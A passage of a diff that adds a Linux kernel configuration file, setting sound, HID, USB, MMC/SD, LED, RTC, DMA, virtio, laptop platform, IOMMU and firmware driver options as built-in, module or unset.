+CONFIG_DUMMY_CONSOLE_COLUMNS=80
+CONFIG_DUMMY_CONSOLE_ROWS=25
+CONFIG_FRAMEBUFFER_CONSOLE=y
+CONFIG_FRAMEBUFFER_CONSOLE_DETECT_PRIMARY=y
+# CONFIG_FRAMEBUFFER_CONSOLE_ROTATION is not set
+# CONFIG_LOGO is not set
+CONFIG_SOUND=m
+# CONFIG_SOUND_OSS_CORE is not set
+CONFIG_SND=m
+CONFIG_SND_TIMER=m
+CONFIG_SND_PCM=m
+CONFIG_SND_JACK=y
+CONFIG_SND_JACK_INPUT_DEV=y
+# CONFIG_SND_SEQUENCER is not set
+# CONFIG_SND_MIXER_OSS is not set
+# CONFIG_SND_PCM_OSS is not set
+CONFIG_SND_PCM_TIMER=y
+# CONFIG_SND_HRTIMER is not set
+# CONFIG_SND_DYNAMIC_MINORS is not set
+CONFIG_SND_SUPPORT_OLD_API=y
+CONFIG_SND_PROC_FS=y
+CONFIG_SND_VERBOSE_PROCFS=y
+# CONFIG_SND_VERBOSE_PRINTK is not set
+# CONFIG_SND_DEBUG is not set
+CONFIG_SND_VMASTER=y
+CONFIG_SND_DMA_SGBUF=y
+# CONFIG_SND_RAWMIDI_SEQ is not set
+# CONFIG_SND_OPL3_LIB_SEQ is not set
+# CONFIG_SND_OPL4_LIB_SEQ is not set
+# CONFIG_SND_SBAWE_SEQ is not set
+# CONFIG_SND_EMU10K1_SEQ is not set
+# CONFIG_SND_DRIVERS is not set
+CONFIG_SND_PCI=y
+# CONFIG_SND_AD1889 is not set
+# CONFIG_SND_ALS300 is not set
+# CONFIG_SND_ALS4000 is not set
+# CONFIG_SND_ALI5451 is not set
+# CONFIG_SND_ASIHPI is not set
+# CONFIG_SND_ATIIXP is not set
+# CONFIG_SND_ATIIXP_MODEM is not set
+# CONFIG_SND_AU8810 is not set
+# CONFIG_SND_AU8820 is not set
+# CONFIG_SND_AU8830 is not set
+# CONFIG_SND_AW2 is not set
+# CONFIG_SND_AZT3328 is not set
+# CONFIG_SND_BT87X is not set
+# CONFIG_SND_CA0106 is not set
+# CONFIG_SND_CMIPCI is not set
+# CONFIG_SND_OXYGEN is not set
+# CONFIG_SND_CS4281 is not set
+# CONFIG_SND_CS46XX is not set
+# CONFIG_SND_CTXFI is not set
+# CONFIG_SND_DARLA20 is not set
+# CONFIG_SND_GINA20 is not set
+# CONFIG_SND_LAYLA20 is not set
+# CONFIG_SND_DARLA24 is not set
+# CONFIG_SND_GINA24 is not set
+# CONFIG_SND_LAYLA24 is not set
+# CONFIG_SND_MONA is not set
+# CONFIG_SND_MIA is not set
+# CONFIG_SND_ECHO3G is not set
+# CONFIG_SND_INDIGO is not set
+# CONFIG_SND_INDIGOIO is not set
+# CONFIG_SND_INDIGODJ is not set
+# CONFIG_SND_INDIGOIOX is not set
+# CONFIG_SND_INDIGODJX is not set
+# CONFIG_SND_EMU10K1 is not set
+# CONFIG_SND_EMU10K1X is not set
+# CONFIG_SND_ENS1370 is not set
+# CONFIG_SND_ENS1371 is not set
+# CONFIG_SND_ES1938 is not set
+# CONFIG_SND_ES1968 is not set
+# CONFIG_SND_FM801 is not set
+# CONFIG_SND_HDSP is not set
+# CONFIG_SND_HDSPM is not set
+# CONFIG_SND_ICE1712 is not set
+# CONFIG_SND_ICE1724 is not set
+# CONFIG_SND_INTEL8X0 is not set
+# CONFIG_SND_INTEL8X0M is not set
+# CONFIG_SND_KORG1212 is not set
+# CONFIG_SND_LOLA is not set
+# CONFIG_SND_LX6464ES is not set
+# CONFIG_SND_MAESTRO3 is not set
+# CONFIG_SND_MIXART is not set
+# CONFIG_SND_NM256 is not set
+# CONFIG_SND_PCXHR is not set
+# CONFIG_SND_RIPTIDE is not set
+# CONFIG_SND_RME32 is not set
+# CONFIG_SND_RME96 is not set
+# CONFIG_SND_RME9652 is not set
+# CONFIG_SND_SE6X is not set
+# CONFIG_SND_SONICVIBES is not set
+# CONFIG_SND_TRIDENT is not set
+# CONFIG_SND_VIA82XX is not set
+# CONFIG_SND_VIA82XX_MODEM is not set
+# CONFIG_SND_VIRTUOSO is not set
+# CONFIG_SND_VX222 is not set
+# CONFIG_SND_YMFPCI is not set
+
+#
+# HD-Audio
+#
+CONFIG_SND_HDA=m
+CONFIG_SND_HDA_INTEL=m
+# CONFIG_SND_HDA_HWDEP is not set
+CONFIG_SND_HDA_RECONFIG=y
+# CONFIG_SND_HDA_INPUT_BEEP is not set
+# CONFIG_SND_HDA_PATCH_LOADER is not set
+CONFIG_SND_HDA_CODEC_REALTEK=m
+CONFIG_SND_HDA_CODEC_ANALOG=m
+CONFIG_SND_HDA_CODEC_SIGMATEL=m
+CONFIG_SND_HDA_CODEC_VIA=m
+CONFIG_SND_HDA_CODEC_HDMI=m
+CONFIG_SND_HDA_CODEC_CIRRUS=m
+CONFIG_SND_HDA_CODEC_CONEXANT=m
+CONFIG_SND_HDA_CODEC_CA0110=m
+CONFIG_SND_HDA_CODEC_CA0132=m
+CONFIG_SND_HDA_CODEC_CA0132_DSP=y
+CONFIG_SND_HDA_CODEC_CMEDIA=m
+CONFIG_SND_HDA_CODEC_SI3054=m
+CONFIG_SND_HDA_GENERIC=m
+CONFIG_SND_HDA_POWER_SAVE_DEFAULT=0
+CONFIG_SND_HDA_CORE=m
+CONFIG_SND_HDA_DSP_LOADER=y
+CONFIG_SND_HDA_I915=y
+CONFIG_SND_HDA_PREALLOC_SIZE=64
+CONFIG_SND_SPI=y
+# CONFIG_SND_USB is not set
+# CONFIG_SND_FIREWIRE is not set
+# CONFIG_SND_PCMCIA is not set
+# CONFIG_SND_SOC is not set
+# CONFIG_SOUND_PRIME is not set
+
+#
+# HID support
+#
+CONFIG_HID=y
+CONFIG_HID_BATTERY_STRENGTH=y
+CONFIG_HIDRAW=y
+CONFIG_UHID=m
+CONFIG_HID_GENERIC=m
+
+#
+# Special HID drivers
+#
+CONFIG_HID_A4TECH=m
+# CONFIG_HID_ACRUX is not set
+CONFIG_HID_APPLE=m
+# CONFIG_HID_APPLEIR is not set
+# CONFIG_HID_ASUS is not set
+# CONFIG_HID_AUREAL is not set
+CONFIG_HID_BELKIN=m
+# CONFIG_HID_BETOP_FF is not set
+CONFIG_HID_CHERRY=m
+CONFIG_HID_CHICONY=m
+# CONFIG_HID_CORSAIR is not set
+# CONFIG_HID_PRODIKEYS is not set
+# CONFIG_HID_CMEDIA is not set
+# CONFIG_HID_CP2112 is not set
+CONFIG_HID_CYPRESS=m
+# CONFIG_HID_DRAGONRISE is not set
+# CONFIG_HID_EMS_FF is not set
+# CONFIG_HID_ELECOM is not set
+# CONFIG_HID_ELO is not set
+CONFIG_HID_EZKEY=m
+# CONFIG_HID_GEMBIRD is not set
+# CONFIG_HID_GFRM is not set
+# CONFIG_HID_HOLTEK is not set
+# CONFIG_HID_GT683R is not set
+# CONFIG_HID_KEYTOUCH is not set
+# CONFIG_HID_KYE is not set
+# CONFIG_HID_UCLOGIC is not set
+# CONFIG_HID_WALTOP is not set
+# CONFIG_HID_GYRATION is not set
+# CONFIG_HID_ICADE is not set
+# CONFIG_HID_TWINHAN is not set
+CONFIG_HID_KENSINGTON=m
+# CONFIG_HID_LCPOWER is not set
+# CONFIG_HID_LED is not set
+# CONFIG_HID_LENOVO is not set
+CONFIG_HID_LOGITECH=m
+CONFIG_HID_LOGITECH_DJ=m
+CONFIG_HID_LOGITECH_HIDPP=m
+# CONFIG_LOGITECH_FF is not set
+# CONFIG_LOGIRUMBLEPAD2_FF is not set
+# CONFIG_LOGIG940_FF is not set
+# CONFIG_LOGIWHEELS_FF is not set
+# CONFIG_HID_MAGICMOUSE is not set
+CONFIG_HID_MICROSOFT=m
+CONFIG_HID_MONTEREY=m
+# CONFIG_HID_MULTITOUCH is not set
+# CONFIG_HID_NTRIG is not set
+# CONFIG_HID_ORTEK is not set
+# CONFIG_HID_PANTHERLORD is not set
+# CONFIG_HID_PENMOUNT is not set
+# CONFIG_HID_PETALYNX is not set
+# CONFIG_HID_PICOLCD is not set
+# CONFIG_HID_PLANTRONICS is not set
+# CONFIG_HID_PRIMAX is not set
+# CONFIG_HID_ROCCAT is not set
+# CONFIG_HID_SAITEK is not set
+# CONFIG_HID_SAMSUNG is not set
+# CONFIG_HID_SONY is not set
+# CONFIG_HID_SPEEDLINK is not set
+# CONFIG_HID_STEELSERIES is not set
+# CONFIG_HID_SUNPLUS is not set
+# CONFIG_HID_RMI is not set
+# CONFIG_HID_GREENASIA is not set
+# CONFIG_HID_SMARTJOYPLUS is not set
+# CONFIG_HID_TIVO is not set
+# CONFIG_HID_TOPSEED is not set
+# CONFIG_HID_THINGM is not set
+# CONFIG_HID_THRUSTMASTER is not set
+# CONFIG_HID_WACOM is not set
+# CONFIG_HID_WIIMOTE is not set
+# CONFIG_HID_XINMO is not set
+# CONFIG_HID_ZEROPLUS is not set
+# CONFIG_HID_ZYDACRON is not set
+# CONFIG_HID_SENSOR_HUB is not set
+# CONFIG_HID_ALPS is not set
+
+#
+# USB HID support
+#
+CONFIG_USB_HID=y
+# CONFIG_HID_PID is not set
+# CONFIG_USB_HIDDEV is not set
+
+#
+# I2C HID support
+#
+CONFIG_I2C_HID=m
+
+#
+# Intel ISH HID support
+#
+CONFIG_INTEL_ISH_HID=m
+CONFIG_USB_OHCI_LITTLE_ENDIAN=y
+CONFIG_USB_SUPPORT=y
+CONFIG_USB_COMMON=y
+CONFIG_USB_ARCH_HAS_HCD=y
+CONFIG_USB=y
+CONFIG_USB_ANNOUNCE_NEW_DEVICES=y
+
+#
+# Miscellaneous USB options
+#
+CONFIG_USB_DEFAULT_PERSIST=y
+# CONFIG_USB_DYNAMIC_MINORS is not set
+# CONFIG_USB_OTG is not set
+# CONFIG_USB_OTG_WHITELIST is not set
+# CONFIG_USB_OTG_BLACKLIST_HUB is not set
+# CONFIG_USB_LEDS_TRIGGER_USBPORT is not set
+CONFIG_USB_MON=m
+# CONFIG_USB_WUSB_CBAF is not set
+
+#
+# USB Host Controller Drivers
+#
+# CONFIG_USB_C67X00_HCD is not set
+CONFIG_USB_XHCI_HCD=y
+CONFIG_USB_XHCI_PCI=y
+# CONFIG_USB_XHCI_PLATFORM is not set
+CONFIG_USB_EHCI_HCD=y
+CONFIG_USB_EHCI_ROOT_HUB_TT=y
+CONFIG_USB_EHCI_TT_NEWSCHED=y
+CONFIG_USB_EHCI_PCI=y
+# CONFIG_USB_EHCI_HCD_PLATFORM is not set
+# CONFIG_USB_OXU210HP_HCD is not set
+# CONFIG_USB_ISP116X_HCD is not set
+# CONFIG_USB_ISP1362_HCD is not set
+# CONFIG_USB_FOTG210_HCD is not set
+# CONFIG_USB_MAX3421_HCD is not set
+CONFIG_USB_OHCI_HCD=y
+CONFIG_USB_OHCI_HCD_PCI=y
+# CONFIG_USB_OHCI_HCD_PLATFORM is not set
+CONFIG_USB_UHCI_HCD=y
+# CONFIG_USB_SL811_HCD is not set
+# CONFIG_USB_R8A66597_HCD is not set
+# CONFIG_USB_HCD_BCMA is not set
+# CONFIG_USB_HCD_SSB is not set
+# CONFIG_USB_HCD_TEST_MODE is not set
+
+#
+# USB Device Class drivers
+#
+CONFIG_USB_ACM=m
+# CONFIG_USB_PRINTER is not set
+# CONFIG_USB_WDM is not set
+# CONFIG_USB_TMC is not set
+
+#
+# NOTE: USB_STORAGE depends on SCSI but BLK_DEV_SD may
+#
+
+#
+# also be needed; see USB_STORAGE Help for more info
+#
+CONFIG_USB_STORAGE=m
+# CONFIG_USB_STORAGE_DEBUG is not set
+# CONFIG_USB_STORAGE_REALTEK is not set
+# CONFIG_USB_STORAGE_DATAFAB is not set
+# CONFIG_USB_STORAGE_FREECOM is not set
+# CONFIG_USB_STORAGE_ISD200 is not set
+# CONFIG_USB_STORAGE_USBAT is not set
+# CONFIG_USB_STORAGE_SDDR09 is not set
+# CONFIG_USB_STORAGE_SDDR55 is not set
+# CONFIG_USB_STORAGE_JUMPSHOT is not set
+# CONFIG_USB_STORAGE_ALAUDA is not set
+# CONFIG_USB_STORAGE_ONETOUCH is not set
+# CONFIG_USB_STORAGE_KARMA is not set
+# CONFIG_USB_STORAGE_CYPRESS_ATACB is not set
+# CONFIG_USB_STORAGE_ENE_UB6250 is not set
+# CONFIG_USB_UAS is not set
+
+#
+# USB Imaging devices
+#
+# CONFIG_USB_MDC800 is not set
+# CONFIG_USB_MICROTEK is not set
+# CONFIG_USBIP_CORE is not set
+# CONFIG_USB_MUSB_HDRC is not set
+# CONFIG_USB_DWC3 is not set
+# CONFIG_USB_DWC2 is not set
+# CONFIG_USB_CHIPIDEA is not set
+# CONFIG_USB_ISP1760 is not set
+
+#
+# USB port drivers
+#
+# CONFIG_USB_SERIAL is not set
+
+#
+# USB Miscellaneous drivers
+#
+# CONFIG_USB_EMI62 is not set
+# CONFIG_USB_EMI26 is not set
+# CONFIG_USB_ADUTUX is not set
+# CONFIG_USB_SEVSEG is not set
+# CONFIG_USB_RIO500 is not set
+# CONFIG_USB_LEGOTOWER is not set
+# CONFIG_USB_LCD is not set
+# CONFIG_USB_CYPRESS_CY7C63 is not set
+# CONFIG_USB_CYTHERM is not set
+# CONFIG_USB_IDMOUSE is not set
+# CONFIG_USB_FTDI_ELAN is not set
+# CONFIG_USB_APPLEDISPLAY is not set
+# CONFIG_USB_SISUSBVGA is not set
+# CONFIG_USB_LD is not set
+# CONFIG_USB_TRANCEVIBRATOR is not set
+# CONFIG_USB_IOWARRIOR is not set
+# CONFIG_USB_TEST is not set
+# CONFIG_USB_EHSET_TEST_FIXTURE is not set
+# CONFIG_USB_ISIGHTFW is not set
+# CONFIG_USB_YUREX is not set
+# CONFIG_USB_EZUSB_FX2 is not set
+# CONFIG_USB_HSIC_USB3503 is not set
+# CONFIG_USB_HSIC_USB4604 is not set
+# CONFIG_USB_LINK_LAYER_TEST is not set
+# CONFIG_UCSI is not set
+
+#
+# USB Physical Layer drivers
+#
+# CONFIG_USB_PHY is not set
+# CONFIG_NOP_USB_XCEIV is not set
+# CONFIG_USB_GPIO_VBUS is not set
+# CONFIG_USB_ISP1301 is not set
+# CONFIG_USB_GADGET is not set
+# CONFIG_USB_LED_TRIG is not set
+# CONFIG_USB_ULPI_BUS is not set
+# CONFIG_UWB is not set
+CONFIG_MMC=m
+# CONFIG_MMC_DEBUG is not set
+
+#
+# MMC/SD/SDIO Card Drivers
+#
+CONFIG_MMC_BLOCK=m
+CONFIG_MMC_BLOCK_MINORS=8
+CONFIG_MMC_BLOCK_BOUNCE=y
+CONFIG_SDIO_UART=m
+# CONFIG_MMC_TEST is not set
+
+#
+# MMC/SD/SDIO Host Controller Drivers
+#
+CONFIG_MMC_SDHCI=m
+CONFIG_MMC_SDHCI_PCI=m
+CONFIG_MMC_RICOH_MMC=y
+CONFIG_MMC_SDHCI_ACPI=m
+CONFIG_MMC_SDHCI_PLTFM=m
+CONFIG_MMC_WBSD=m
+CONFIG_MMC_TIFM_SD=m
+CONFIG_MMC_SPI=m
+CONFIG_MMC_SDRICOH_CS=m
+CONFIG_MMC_CB710=m
+CONFIG_MMC_VIA_SDMMC=m
+CONFIG_MMC_VUB300=m
+CONFIG_MMC_USHC=m
+CONFIG_MMC_USDHI6ROL0=m
+CONFIG_MMC_REALTEK_PCI=m
+CONFIG_MMC_REALTEK_USB=m
+CONFIG_MMC_TOSHIBA_PCI=m
+CONFIG_MMC_MTK=m
+CONFIG_MEMSTICK=m
+# CONFIG_MEMSTICK_DEBUG is not set
+
+#
+# MemoryStick drivers
+#
+# CONFIG_MEMSTICK_UNSAFE_RESUME is not set
+CONFIG_MSPRO_BLOCK=m
+CONFIG_MS_BLOCK=m
+
+#
+# MemoryStick Host Controller Drivers
+#
+CONFIG_MEMSTICK_TIFM_MS=m
+CONFIG_MEMSTICK_JMICRON_38X=m
+CONFIG_MEMSTICK_R592=m
+CONFIG_MEMSTICK_REALTEK_PCI=m
+CONFIG_MEMSTICK_REALTEK_USB=m
+CONFIG_NEW_LEDS=y
+CONFIG_LEDS_CLASS=m
+# CONFIG_LEDS_CLASS_FLASH is not set
+
+#
+# LED drivers
+#
+# CONFIG_LEDS_LM3530 is not set
+# CONFIG_LEDS_LM3642 is not set
+# CONFIG_LEDS_PCA9532 is not set
+# CONFIG_LEDS_GPIO is not set
+# CONFIG_LEDS_LP3944 is not set
+# CONFIG_LEDS_LP3952 is not set
+# CONFIG_LEDS_LP5521 is not set
+# CONFIG_LEDS_LP5523 is not set
+# CONFIG_LEDS_LP5562 is not set
+# CONFIG_LEDS_LP8501 is not set
+# CONFIG_LEDS_LP8860 is not set
+# CONFIG_LEDS_CLEVO_MAIL is not set
+# CONFIG_LEDS_PCA955X is not set
+# CONFIG_LEDS_PCA963X is not set
+# CONFIG_LEDS_DAC124S085 is not set
+# CONFIG_LEDS_REGULATOR is not set
+# CONFIG_LEDS_BD2802 is not set
+# CONFIG_LEDS_INTEL_SS4200 is not set
+# CONFIG_LEDS_LT3593 is not set
+# CONFIG_LEDS_TCA6507 is not set
+# CONFIG_LEDS_TLC591XX is not set
+# CONFIG_LEDS_LM355x is not set
+
+#
+# LED driver for blink(1) USB RGB LED is under Special HID drivers (HID_THINGM)
+#
+# CONFIG_LEDS_BLINKM is not set
+# CONFIG_LEDS_MLXCPLD is not set
+
+#
+# LED Triggers
+#
+CONFIG_LEDS_TRIGGERS=y
+# CONFIG_LEDS_TRIGGER_TIMER is not set
+# CONFIG_LEDS_TRIGGER_ONESHOT is not set
+# CONFIG_LEDS_TRIGGER_DISK is not set
+# CONFIG_LEDS_TRIGGER_HEARTBEAT is not set
+# CONFIG_LEDS_TRIGGER_BACKLIGHT is not set
+# CONFIG_LEDS_TRIGGER_CPU is not set
+# CONFIG_LEDS_TRIGGER_GPIO is not set
+# CONFIG_LEDS_TRIGGER_DEFAULT_ON is not set
+
+#
+# iptables trigger is under Netfilter config (LED target)
+#
+# CONFIG_LEDS_TRIGGER_TRANSIENT is not set
+# CONFIG_LEDS_TRIGGER_CAMERA is not set
+# CONFIG_LEDS_TRIGGER_PANIC is not set
+# CONFIG_ACCESSIBILITY is not set
+# CONFIG_INFINIBAND is not set
+CONFIG_EDAC_ATOMIC_SCRUB=y
+CONFIG_EDAC_SUPPORT=y
+# CONFIG_EDAC is not set
+CONFIG_RTC_LIB=y
+CONFIG_RTC_MC146818_LIB=y
+CONFIG_RTC_CLASS=y
+CONFIG_RTC_HCTOSYS=y
+CONFIG_RTC_HCTOSYS_DEVICE="rtc0"
+CONFIG_RTC_SYSTOHC=y
+CONFIG_RTC_SYSTOHC_DEVICE="rtc0"
+# CONFIG_RTC_DEBUG is not set
+
+#
+# RTC interfaces
+#
+CONFIG_RTC_INTF_SYSFS=y
+CONFIG_RTC_INTF_PROC=y
+CONFIG_RTC_INTF_DEV=y
+# CONFIG_RTC_INTF_DEV_UIE_EMUL is not set
+# CONFIG_RTC_DRV_TEST is not set
+
+#
+# I2C RTC drivers
+#
+# CONFIG_RTC_DRV_ABB5ZES3 is not set
+# CONFIG_RTC_DRV_ABX80X is not set
+# CONFIG_RTC_DRV_DS1307 is not set
+# CONFIG_RTC_DRV_DS1374 is not set
+# CONFIG_RTC_DRV_DS1672 is not set
+# CONFIG_RTC_DRV_MAX6900 is not set
+# CONFIG_RTC_DRV_RS5C372 is not set
+# CONFIG_RTC_DRV_ISL1208 is not set
+# CONFIG_RTC_DRV_ISL12022 is not set
+# CONFIG_RTC_DRV_X1205 is not set
+# CONFIG_RTC_DRV_PCF8523 is not set
+# CONFIG_RTC_DRV_PCF85063 is not set
+# CONFIG_RTC_DRV_PCF8563 is not set
+# CONFIG_RTC_DRV_PCF8583 is not set
+# CONFIG_RTC_DRV_M41T80 is not set
+# CONFIG_RTC_DRV_BQ32K is not set
+# CONFIG_RTC_DRV_S35390A is not set
+# CONFIG_RTC_DRV_FM3130 is not set
+# CONFIG_RTC_DRV_RX8010 is not set
+# CONFIG_RTC_DRV_RX8581 is not set
+# CONFIG_RTC_DRV_RX8025 is not set
+# CONFIG_RTC_DRV_EM3027 is not set
+# CONFIG_RTC_DRV_RV8803 is not set
+
+#
+# SPI RTC drivers
+#
+# CONFIG_RTC_DRV_M41T93 is not set
+# CONFIG_RTC_DRV_M41T94 is not set
+# CONFIG_RTC_DRV_DS1302 is not set
+# CONFIG_RTC_DRV_DS1305 is not set
+# CONFIG_RTC_DRV_DS1343 is not set
+# CONFIG_RTC_DRV_DS1347 is not set
+# CONFIG_RTC_DRV_DS1390 is not set
+# CONFIG_RTC_DRV_MAX6916 is not set
+# CONFIG_RTC_DRV_R9701 is not set
+# CONFIG_RTC_DRV_RX4581 is not set
+# CONFIG_RTC_DRV_RX6110 is not set
+# CONFIG_RTC_DRV_RS5C348 is not set
+# CONFIG_RTC_DRV_MAX6902 is not set
+# CONFIG_RTC_DRV_PCF2123 is not set
+# CONFIG_RTC_DRV_MCP795 is not set
+CONFIG_RTC_I2C_AND_SPI=y
+
+#
+# SPI and I2C RTC drivers
+#
+# CONFIG_RTC_DRV_DS3232 is not set
+# CONFIG_RTC_DRV_PCF2127 is not set
+# CONFIG_RTC_DRV_RV3029C2 is not set
+
+#
+# Platform RTC drivers
+#
+CONFIG_RTC_DRV_CMOS=y
+# CONFIG_RTC_DRV_DS1286 is not set
+# CONFIG_RTC_DRV_DS1511 is not set
+# CONFIG_RTC_DRV_DS1553 is not set
+# CONFIG_RTC_DRV_DS1685_FAMILY is not set
+# CONFIG_RTC_DRV_DS1742 is not set
+# CONFIG_RTC_DRV_DS2404 is not set
+# CONFIG_RTC_DRV_STK17TA8 is not set
+# CONFIG_RTC_DRV_M48T86 is not set
+# CONFIG_RTC_DRV_M48T35 is not set
+# CONFIG_RTC_DRV_M48T59 is not set
+# CONFIG_RTC_DRV_MSM6242 is not set
+# CONFIG_RTC_DRV_BQ4802 is not set
+# CONFIG_RTC_DRV_RP5C01 is not set
+# CONFIG_RTC_DRV_V3020 is not set
+
+#
+# on-CPU RTC drivers
+#
+
+#
+# HID Sensor RTC drivers
+#
+# CONFIG_RTC_DRV_HID_SENSOR_TIME is not set
+CONFIG_DMADEVICES=y
+# CONFIG_DMADEVICES_DEBUG is not set
+
+#
+# DMA Devices
+#
+CONFIG_DMA_ENGINE=y
+CONFIG_DMA_VIRTUAL_CHANNELS=m
+CONFIG_DMA_ACPI=y
+CONFIG_INTEL_IDMA64=m
+CONFIG_INTEL_IOATDMA=m
+CONFIG_QCOM_HIDMA_MGMT=m
+CONFIG_QCOM_HIDMA=m
+CONFIG_DW_DMAC_CORE=m
+CONFIG_DW_DMAC=m
+CONFIG_DW_DMAC_PCI=m
+
+#
+# DMA Clients
+#
+CONFIG_ASYNC_TX_DMA=y
+# CONFIG_DMATEST is not set
+CONFIG_DMA_ENGINE_RAID=y
+
+#
+# DMABUF options
+#
+# CONFIG_SYNC_FILE is not set
+CONFIG_DCA=m
+# CONFIG_AUXDISPLAY is not set
+CONFIG_UIO=m
+# CONFIG_UIO_CIF is not set
+# CONFIG_UIO_PDRV_GENIRQ is not set
+# CONFIG_UIO_DMEM_GENIRQ is not set
+# CONFIG_UIO_AEC is not set
+# CONFIG_UIO_SERCOS3 is not set
+# CONFIG_UIO_PCI_GENERIC is not set
+# CONFIG_UIO_NETX is not set
+# CONFIG_UIO_PRUSS is not set
+# CONFIG_UIO_MF624 is not set
+# CONFIG_VFIO is not set
+CONFIG_IRQ_BYPASS_MANAGER=y
+# CONFIG_VIRT_DRIVERS is not set
+CONFIG_VIRTIO=y
+
+#
+# Virtio drivers
+#
+CONFIG_VIRTIO_PCI=y
+CONFIG_VIRTIO_PCI_LEGACY=y
+CONFIG_VIRTIO_BALLOON=m
+CONFIG_VIRTIO_INPUT=m
+CONFIG_VIRTIO_MMIO=m
+CONFIG_VIRTIO_MMIO_CMDLINE_DEVICES=y
+
+#
+# Microsoft Hyper-V guest support
+#
+# CONFIG_HYPERV is not set
+# CONFIG_STAGING is not set
+CONFIG_X86_PLATFORM_DEVICES=y
+CONFIG_ACER_WMI=m
+CONFIG_ACERHDF=m
+CONFIG_ALIENWARE_WMI=m
+CONFIG_ASUS_LAPTOP=m
+CONFIG_DELL_WMI_AIO=m
+CONFIG_DELL_SMO8800=m
+CONFIG_DELL_RBTN=m
+CONFIG_FUJITSU_LAPTOP=m
+# CONFIG_FUJITSU_LAPTOP_DEBUG is not set
+CONFIG_FUJITSU_TABLET=m
+CONFIG_AMILO_RFKILL=m
+CONFIG_HP_ACCEL=m
+CONFIG_HP_WIRELESS=m
+CONFIG_HP_WMI=m
+CONFIG_MSI_LAPTOP=m
+CONFIG_PANASONIC_LAPTOP=m
+CONFIG_COMPAL_LAPTOP=m
+CONFIG_SONY_LAPTOP=m
+# CONFIG_SONYPI_COMPAT is not set
+CONFIG_IDEAPAD_LAPTOP=m
+CONFIG_THINKPAD_ACPI=m
+CONFIG_THINKPAD_ACPI_ALSA_SUPPORT=y
+# CONFIG_THINKPAD_ACPI_DEBUGFACILITIES is not set
+# CONFIG_THINKPAD_ACPI_DEBUG is not set
+# CONFIG_THINKPAD_ACPI_UNSAFE_LEDS is not set
+CONFIG_THINKPAD_ACPI_VIDEO=y
+CONFIG_THINKPAD_ACPI_HOTKEY_POLL=y
+CONFIG_SENSORS_HDAPS=m
+CONFIG_INTEL_MENLOW=m
+# CONFIG_EEEPC_LAPTOP is not set
+# CONFIG_ASUS_WMI is not set
+CONFIG_ASUS_WIRELESS=m
+CONFIG_ACPI_WMI=m
+CONFIG_MSI_WMI=m
+CONFIG_TOPSTAR_LAPTOP=m
+CONFIG_TOSHIBA_BT_RFKILL=m
+CONFIG_TOSHIBA_HAPS=m
+CONFIG_TOSHIBA_WMI=m
+CONFIG_ACPI_CMPC=m
+CONFIG_INTEL_HID_EVENT=m
+CONFIG_INTEL_VBTN=m
+CONFIG_INTEL_IPS=m
+CONFIG_INTEL_PMC_CORE=y
+CONFIG_IBM_RTL=m
+CONFIG_SAMSUNG_LAPTOP=m
+CONFIG_MXM_WMI=m
+CONFIG_INTEL_OAKTRAIL=m
+CONFIG_SAMSUNG_Q10=m
+CONFIG_APPLE_GMUX=m
+CONFIG_INTEL_RST=m
+CONFIG_INTEL_SMARTCONNECT=m
+CONFIG_PVPANIC=m
+CONFIG_INTEL_PMC_IPC=m
+CONFIG_SURFACE_PRO3_BUTTON=m
+CONFIG_INTEL_PUNIT_IPC=m
+# CONFIG_INTEL_TELEMETRY is not set
+# CONFIG_CHROME_PLATFORMS is not set
+CONFIG_CLKDEV_LOOKUP=y
+CONFIG_HAVE_CLK_PREPARE=y
+CONFIG_COMMON_CLK=y
+
+#
+# Common Clock Framework
+#
+CONFIG_COMMON_CLK_SI5351=m
+CONFIG_COMMON_CLK_CDCE706=m
+CONFIG_COMMON_CLK_CS2000_CP=m
+# CONFIG_COMMON_CLK_NXP is not set
+# CONFIG_COMMON_CLK_PXA is not set
+# CONFIG_COMMON_CLK_PIC32 is not set
+
+#
+# Hardware Spinlock drivers
+#
+
+#
+# Clock Source drivers
+#
+CONFIG_CLKEVT_I8253=y
+CONFIG_I8253_LOCK=y
+CONFIG_CLKBLD_I8253=y
+# CONFIG_ATMEL_PIT is not set
+# CONFIG_SH_TIMER_CMT is not set
+# CONFIG_SH_TIMER_MTU2 is not set
+# CONFIG_SH_TIMER_TMU is not set
+# CONFIG_EM_TIMER_STI is not set
+# CONFIG_MAILBOX is not set
+CONFIG_IOMMU_API=y
+CONFIG_IOMMU_SUPPORT=y
+
+#
+# Generic IOMMU Pagetable Support
+#
+CONFIG_IOMMU_IOVA=y
+CONFIG_AMD_IOMMU=y
+# CONFIG_AMD_IOMMU_V2 is not set
+CONFIG_DMAR_TABLE=y
+CONFIG_INTEL_IOMMU=y
+# CONFIG_INTEL_IOMMU_SVM is not set
+CONFIG_INTEL_IOMMU_DEFAULT_ON=y
+CONFIG_INTEL_IOMMU_FLOPPY_WA=y
+# CONFIG_IRQ_REMAP is not set
+
+#
+# Remoteproc drivers
+#
+# CONFIG_STE_MODEM_RPROC is not set
+
+#
+# Rpmsg drivers
+#
+
+#
+# SOC (System On Chip) specific Drivers
+#
+
+#
+# Broadcom SoC drivers
+#
+# CONFIG_SUNXI_SRAM is not set
+# CONFIG_SOC_TI is not set
+# CONFIG_PM_DEVFREQ is not set
+# CONFIG_EXTCON is not set
+# CONFIG_MEMORY is not set
+# CONFIG_IIO is not set
+# CONFIG_NTB is not set
+# CONFIG_VME_BUS is not set
+# CONFIG_PWM is not set
+CONFIG_ARM_GIC_MAX_NR=1
+# CONFIG_IPACK_BUS is not set
+# CONFIG_RESET_CONTROLLER is not set
+# CONFIG_FMC is not set
+
+#
+# PHY Subsystem
+#
+CONFIG_GENERIC_PHY=y
+# CONFIG_PHY_PXA_28NM_HSIC is not set
+# CONFIG_PHY_PXA_28NM_USB2 is not set
+# CONFIG_BCM_KONA_USB2_PHY is not set
+# CONFIG_POWERCAP is not set
+# CONFIG_MCB is not set
+
+#
+# Performance monitor support
+#
+CONFIG_RAS=y
+# CONFIG_THUNDERBOLT is not set
+
+#
+# Android
+#
+# CONFIG_ANDROID is not set
+CONFIG_LIBNVDIMM=m
+CONFIG_BLK_DEV_PMEM=m
+CONFIG_ND_BLK=m
+CONFIG_ND_CLAIM=y
+CONFIG_ND_BTT=m
+CONFIG_BTT=y
+# CONFIG_NVMEM is not set
+# CONFIG_STM is not set
+# CONFIG_INTEL_TH is not set
+
+#
+# FPGA Configuration Support
+#
+# CONFIG_FPGA is not set
+
+#
+# Firmware Drivers
+#
+# CONFIG_EDD is not set
+CONFIG_FIRMWARE_MEMMAP=y
+# CONFIG_DELL_RBU is not set
+# CONFIG_DCDBAS is not set
+CONFIG_DMIID=y
+CONFIG_DMI_SYSFS=m
